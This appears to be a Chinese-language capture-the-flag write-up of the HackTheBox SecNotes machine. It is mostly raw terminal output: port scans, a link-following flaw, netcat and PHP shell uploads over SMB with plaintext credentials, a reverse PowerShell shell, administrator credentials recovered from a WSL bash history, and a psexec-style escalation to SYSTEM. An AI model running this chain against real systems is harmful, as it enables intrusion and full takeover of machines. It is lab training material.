┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p- --min-rate=10000 -oG allports [sudo] kali 的密码: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-28 21:43 CST Nmap scan report for10.10.10.97 Host is up (0.50s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 445/tcp open microsoft-ds 8808/tcp open ssports-bcast
Nmap done: 1 IP address (1 host up) scanned in 23.09 seconds
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-title: Secure Notes - Login |_Requested resource was login.php | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: HTB) 8808/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows | http-methods: |_ Potentially risky methods: TRACE Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: | smb2-time: | date: 2024-03-28T13:45:15 |_ start_date: N/A | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 54.63 seconds
6、发现 contact.php 页面可以输入链接地址,且会访问这个链接地址,说明这个是一个漏洞点
1 2 3 4 5 6 7 8
┌──(kali㉿offsec)-[~/Desktop] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [] from (UNKNOWN) [] 50709 GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.228 Host: Connection: Keep-Alive
1 2 3 4 5 6 7 8
┌──(kali㉿offsec)-[~/Desktop] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [] from (UNKNOWN) [] 50759 GET /whoami?id=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.228 Host: Connection: Keep-Alive
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC new-site Disk Reconnecting with SMB1 for workgroup listing. do_connect: Connection to failed (Error NT_STATUS_IO_TIMEOUT) Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿offsec)-[~/Desktop] └─$ smbclient \\\\\\new-site -U tyler%'92g!mA8BGjOirkL%OG*&' Try "help" to get a list of possible commands. smb: \> put nc.exe putting file nc.exe as \nc.exe (13.9 kb/s) (average 13.9 kb/s) smb: \> put shell.php putting file shell.php as \shell.php (0.0 kb/s) (average 11.1 kb/s) smb: \>
┌──(kali㉿offsec)-[~/Desktop] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [] from (UNKNOWN) [] 50231 Windows PowerShell Copyright(C) Microsoft Corporation. All rights reserved.
ls C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState
PS C:\Distros\Ubuntu> ls C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState ls C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState
ls C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs
PS C:\Distros\Ubuntu> ls C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs ls C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs
PS C:\Distros\Ubuntu> gc C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root\* gc C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root\* gc : Access to the path 'C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc \LocalState\rootfs\root\filesystem' is denied. At line:1char:1 + gc C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : PermissionDenied: (C:\Users\tyler\...root\filesystem:String) [Get-Content], Unauthorized AccessException + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
cd ~ cd /mnt/c/ ls cd Users/ cd / cd ~ ls pwd mkdir filesystem mount //$ filesystem/ sudo apt install cifs-utils mount //$ filesystem/ mount //$ filesystem/ -o user=administrator cat /proc/filesystems sudo modprobe cifs smbclient apt install smbclient smbclient smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\\\c$ > .bash_history less .bash_history exit
if [ "$BASH" ]; then if [ -f ~/.bashrc ]; then . ~/.bashrc fi fi
[*] Requesting shares on [*] Found writable share ADMIN$ [*] Uploading file SkEcBGeu.exe [*] Opening SVCManager on [*] Creating service WacH on [*] Starting service WacH..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32> C:\WINDOWS\system32> whoami nt authority\system